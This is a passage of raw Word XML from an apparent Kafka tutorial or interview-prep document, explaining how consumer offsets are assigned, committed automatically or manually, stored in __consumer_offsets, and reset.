    <w:p w14:paraId="2F36CC81"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managing their own offsets (i.e., tracking which message they have consumed), and Kafka allows consumers to commit (save) their current offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C4FB8"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mple of Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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741120A1" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9B3D81"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14935ADA"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7BCE8A04" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="501DAC9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1D73BAB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074D012F" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D91BA9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1AB0AF9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284F3E37" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30332CE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364FA3E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286AA4D7" w14:textId="77777777" w:rsidTr="00412451">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03129C6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7C06B56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1E4283EE"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Offset is Managed by Consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AB78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ility for consumers in terms of </w:t>
      </w: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xml:space="preserve">. Offsets can be managed </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically</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manually</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the consumer's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F4D59"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Management (Auto-commit)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B87159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a default setting where the consumer </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically commits</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> offsets after a certain interval (auto.commit.interval.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1855106A"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means that as a consumer processes a message, it records (commits) the offset of that message. In case the consumer crashes or restarts, it can resume from the last committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126366F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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: There could be cases where messages are lost or processed multiple times if the consumer crashes before the offset is committed (due to the auto-commit happening after processing the message).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71A48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xample of enabling auto-commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C20C5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35F2C2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552DE53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5CBFD51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465E7FD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325C171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 (Manual Commit)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EE3349"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ome use cases, you may want finer control over when offsets are committed, especially when processing needs to be more robust.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3222E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manually commit offsets by calling the commitSync() or commitAsync() methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071D8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Sync()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the current offset synchronously, blocking until the commit is acknowledged by Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A82E60C"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Async()</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Commits the current offset asynchronously, not blocking the consumer. This method is faster but might lose track of an offset if something goes wrong during the commit process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC034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manual offset commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAAD9A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76DD77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0BF05969" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EA2CED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onsume messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4C7D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71D391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C8EE6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Consumed message: " + record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712537B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BD64B7B" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271A80E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3ED0FCB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727C7CB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8FF6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ffsets are stored in Kafka itself, specifically in an internal topic called __consumer_offsets. This internal topic holds the offsets for each consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9D4A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offset is stored as a combination of the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For each group and partition, Kafka stores the last successfully committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5ED44B"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 and Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0316B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Kafka consumer group has its own </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>set of offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each partition it consumes from. Different consumer groups can consume the same partition independently, each maintaining their own offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C342B"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two consumers in different groups consume messages from the same partition, they will have separate offsets in the __consumer_offsets topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA117D"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etting Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DC7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reset their offsets to a particular point in time or offset. There are a few options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D127A41"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message available in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E907CD"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most recent message (the end of the log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD12D3"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e.g., offset 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5227E9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an be done using the seek() method or by setting the auto.offset.reset property to earliest or latest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6042B7F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resetting offsets to the earliest message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9971C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BAEA559"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60A413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275AF6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Reset to earliest message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5FD7F" w14:textId="77777777" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576AC2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5AC39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2B2681D9"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Management in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F502AF5"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1: Consumer Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418D03FF"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A Kafka consumer reads from a topic partition. Suppose the consumer has already processed messages up to offset 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF2560"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consumer crashes before committing the offset, upon restarting, it will pick up from the last committed offset (5), ensuring no messages are lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9C89D"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2: Rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8208B9"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en a consumer group undergoes a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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no messages are missed or duplicated across consumers in the same consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E10F8"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55ADC7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are unique to each parti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They allow consumers to track their progress in consuming messages from partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDFED7"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automatically or manually committed</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, giving consumers control over message processing and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B626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ores offsets in the __consumer_offsets internal topic, ensuring the consumer group's progress is persistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F265D1"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allow multiple consumers to scale and parallelize message processing while keeping track of each group's progress through offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38ADF0"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critical in scenarios involving </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message repla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balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> across consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68758DB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Managing offsets correctly is vital for ensuring </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable, efficient, and fault-tolerant</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumption of messages from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427EE57A" w14:textId="0D715E3E"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392" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="738EFF76" w14:textId="0B54D12C"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7" w:name="_Toc197868051"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Define offset in Kafka, how it is assigned, and how Kafka consumers track their consumption position</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="837"/>
    </w:p>
    <w:p w14:paraId="34FB8998" w14:textId="215C10C2" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2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Definition, Assignment, and Consumer Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA570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refers to the unique identifier for each message within a Kafk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What is Kafka Offset?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F9DA1"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Offsets are specific to each partition of a Kafka topic. Different partitions in the same topic have independent sequences of offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC890C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Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66ECB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18C82E7F" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9350AA"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408A6818"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24B4A7C0" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52AC867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3FAE8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3F331758" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4194340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6D9D1B74"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63D13BF5" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26135B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4FAABAE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5D81E451" w14:textId="77777777" w:rsidTr="00047A2A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF6127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373092F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5B20DD2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case, each message in Partition 0 has an offset starting from 0 and incrementing by 1 for each subsequent message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1FAD1"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are Kafka Offsets Assigned?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108FD3E2"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ssigns offsets to messages automatically when they are produced and stored in partitions. Each message added to a partition gets a unique offset assigned incrementally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0422A"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does </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not assign offsets to messages at the time of production</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Instead, it assigns them when the message is stored in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B746E3"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 Assignment Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C272F3B"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ends Message</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Kafka producer sends a message to a topic partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BD031"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is Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The message is stored in the partition, and Kafka assigns an offset to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EA58A"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s Track Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer keeps track of the offsets it has consumed to know where to resume if it needs to restart or recover from a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A192C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How Kafka Consumers Track their Consumption Position (Offsets)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F878DB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use offsets to keep track of their position in a partition, determining which message they have consumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5487A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BE4501B"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Kafka consumers work as part of a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per Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Kafka provides two main methods for managing offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587A0AE"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Offsets are automatically committed after a specified interval. This is controlled by the enable.auto.commit configuration parameter. The consumer doesn't need to manually commit offsets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2BEE68"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orkflow of Tracking Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444137C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ption</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer reads a message from a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150681E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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After reading the message, the consumer commits the offset, either automatically or manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B31B65"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xt Consumption</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the consumer restarts or recovers, it reads the last committed offset from the __consumer_offsets topic and resumes consuming from that point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EB14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utomatic Offset Commit Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154DF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utomatic offset commit is enabled, Kafka automatically tracks and commits the consumer’s position. The consumer will commit offsets periodically (as specified by auto.commit.interval.ms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008FCEC"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3DBCE4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285BD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FC6C8A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080CB27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6A276C8C" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057C379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096D51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41DF7DAC"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anual Offset Commit Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5005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ually commit offsets, providing more control over when offsets are saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A96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2176832A"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5A92A9E3" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478C5C2E"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6EB92E1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1294ED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8C17F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7245D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B8CBB0B" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F07E6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052EBE9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6D527A0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What Happens if the Consumer Crashes or Restarts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102029D9"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If the consumer crashes or restarts, it will resume from the last successfully committed offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF23270"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If the consumer uses manual offset commits, it will resume from the last manually committed offset after a crash or restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3285CCE7"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Offset Reset Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5212881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allows consumers to reset their offsets to different positions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFADF53"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latest available message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52564340"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available message (beginning of the log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525ECEC2"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in the partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2EC0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offset reset behavior is controlled by the auto.offset.reset configuration, which is typically set to latest or earliest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C723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Example of Offset Reset in Kafka Consumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5FE1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681CA5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3C3B58F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4BD1103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Start from the earliest message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68CE73" w14:textId="77777777" w:rsidR="00047A2A" w:rsidRPr="0003272F" w:rsidRDefault="00047A2A" w:rsidP="0003272F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C4E6E6"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DDAC63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7CF322D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Offset Management Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B8911"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s only after successful message processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This ensures that messages are not lost if the consumer crashes before they are successfully processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0215FC43"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manual commit for critical processing</w:t>
      </w:r>
